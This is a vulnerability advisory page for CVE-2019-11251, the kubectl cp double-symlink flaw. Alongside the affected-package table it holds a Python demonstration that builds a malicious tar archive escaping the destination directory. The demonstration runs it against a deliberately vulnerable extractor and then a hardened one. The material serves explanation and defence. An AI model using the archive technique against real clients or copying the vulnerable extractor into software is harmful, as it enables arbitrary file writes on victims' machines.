exploitDog
CVE-2019-11251

Published: 18 Sep 2019
Source: redhat
CVSS3: 5.3

Description

The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree. The vulnerable code is the untar step on the client, not anything in the cluster: kubectl cp runs tar inside the container and unpacks the stream locally, so what matters is the version reported by `kubectl version --client`, and a fixed client protects you regardless of the server version.
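The following is an added example, not code from kubectl or from Red Hat, showing the class of bug the description refers to: an extractor that validates entry names and symlink targets only as path strings is defeated by two symlinks, because the kernel resolves symlinks already on disk when later entries are created through them. The archive it builds is constructed for illustration and is not the original proof of concept; the hardened variant resolves the real on-disk parent directory with `os.path.realpath` before writing, which is the kind of fix required here, not a transcription of kubectl's own patch.

```python
"""Double-symlink escape from a streamed tar archive (the CVE-2019-11251 class).

Added example, not kubectl's code. kubectl cp runs `tar` inside the container
and unpacks the stream on the client, so the archive contents are attacker
controlled. The archive built here is a constructed illustration, not the
original proof of concept.
"""
import io
import os
import shutil
import tarfile
import tempfile


def _under(root, path):
    """True if the normalised path string is root or lies below it."""
    root, path = os.path.normpath(root), os.path.normpath(path)
    return path == root or path.startswith(root + os.sep)


def build_malicious_tar():
    """Constructed archive: every entry looks like it stays inside '.'.

    d/a -> ..      harmless alone: resolves to the destination itself
    d/a/e -> ..    created THROUGH d/a, so it really lands at dest/e, where
                   '..' now means the parent of dest
    d/a/e/pwned    a file written through both links: ends up outside dest
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("d/a", "d/a/e"):
            link = tarfile.TarInfo(name)
            link.type = tarfile.SYMTYPE
            link.linkname = ".."
            tar.addfile(link)
        payload = b"written outside the destination\n"
        info = tarfile.TarInfo("d/a/e/pwned")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def extract_lexical(tar_bytes, dest):
    """Vulnerable: names and symlink targets are checked as strings only.

    Entry path = dest joined with the name, normalised; symlink target = the
    entry's parent joined with the link target, normalised; both must stay
    under dest. Symlinks already on disk are never consulted, but the kernel
    follows them when the entry is created. Returns (written, skipped).
    """
    written, skipped = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar:
            path = os.path.join(dest, m.name)
            parent = os.path.dirname(path)
            if not _under(dest, path):
                skipped.append(m.name)
                continue
            os.makedirs(parent, exist_ok=True)
            if m.issym():
                if not _under(dest, os.path.join(parent, m.linkname)):
                    skipped.append(m.name)
                    continue
                os.symlink(m.linkname, path)
            elif m.isfile():
                with open(path, "wb") as f:
                    f.write(tar.extractfile(m).read())
            else:
                continue  # other entry types are ignored in this example
            written.append(path)
    return written, skipped


def extract_resolving(tar_bytes, dest):
    """Hardened: decide on the real on-disk location before touching it.

    The parent directory is resolved with realpath, a symlink target is
    resolved from that real parent, and an existing symlink is never written
    through. Returns (written real paths, skipped entry names).
    """
    real_dest = os.path.realpath(dest)
    os.makedirs(real_dest, exist_ok=True)
    written, skipped = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar:
            real_parent = os.path.realpath(os.path.join(dest, os.path.dirname(m.name)))
            path = os.path.join(real_parent, os.path.basename(m.name))
            if not _under(real_dest, real_parent) or os.path.islink(path):
                skipped.append(m.name)
                continue
            os.makedirs(real_parent, exist_ok=True)
            if m.issym():
                target = os.path.realpath(os.path.join(real_parent, m.linkname))
                if not _under(real_dest, target):
                    skipped.append(m.name)
                    continue
                os.symlink(m.linkname, path)
            elif m.isfile():
                with open(path, "wb") as f:
                    f.write(tar.extractfile(m).read())
            else:
                continue  # other entry types are ignored in this example
            written.append(path)
    return written, skipped


def demo():
    """Run both extractors on the constructed archive in scratch directories.

    'escaped' is whether a file appeared in the PARENT of the destination.
    """
    tar_bytes = build_malicious_tar()
    results = {}
    for label, extractor in (("lexical", extract_lexical), ("resolving", extract_resolving)):
        root = tempfile.mkdtemp()
        dest = os.path.join(root, "dest")
        os.makedirs(dest)
        _, skipped = extractor(tar_bytes, dest)
        results[label + "_escaped"] = os.path.isfile(os.path.join(root, "pwned"))
        results[label + "_skipped"] = skipped
        shutil.rmtree(root)
    return results


if __name__ == "__main__":
    print(demo())
```

With the lexical extractor the file lands in the parent of the destination even though every path string passed the check; the resolving extractor refuses the second symlink (its real target is the parent of the destination) and the file then stays inside. The same real-path check is what to look for when reviewing any client-side untar code that accepts symlink entries.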

Statement

This issue did not affect the version of Kubernetes (embedded in heketi) shipped with Red Hat Gluster Storage 3, as it does not include the symlink support for kubectl cp.

Affected packages

Platform                                   Package              State         Advisory         Released
Red Hat OpenShift Container Platform 3.10  atomic-openshift     Affected
Red Hat Storage 3                          heketi               Not affected
Red Hat OpenShift Container Platform 3.11  atomic-openshift     Fixed         RHSA-2019:3905   18 Nov 2019
Red Hat OpenShift Container Platform 3.9   atomic-openshift     Fixed         RHSA-2019:3811   07 Nov 2019
Red Hat OpenShift Container Platform 4.1   openshift            Fixed         RHSA-2019:3266   30 Oct 2019
Red Hat OpenShift Container Platform 4.1   openshift4/ose-cli   Fixed         RHSA-2019:3267   30 Oct 2019

Additional information

Severity: Moderate
Weakness: CWE-59 (Improper Link Resolution Before File Access, 'Link Following')
Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1753495 - kubernetes: `kubectl cp` allows for arbitrary file write via double symlinks

Related vulnerabilities

ubuntu (CVSS3: 4.8, more than 5 years ago): same description as above.

nvd (CVSS3: 4.8, more than 5 years ago): same description as above.

debian (CVSS3: 4.8, more than 5 years ago): same description as above (truncated in the listing).

github (CVSS3: 5.7, about 4 years ago): Kubernetes kubectl cp Vulnerable to Symlink Attack

fstec (CVSS3: 5.7, almost 6 years ago): A vulnerability in the kubectl cp command of the Kubernetes virtual machine cluster management software that allows an attacker to upload a malicious file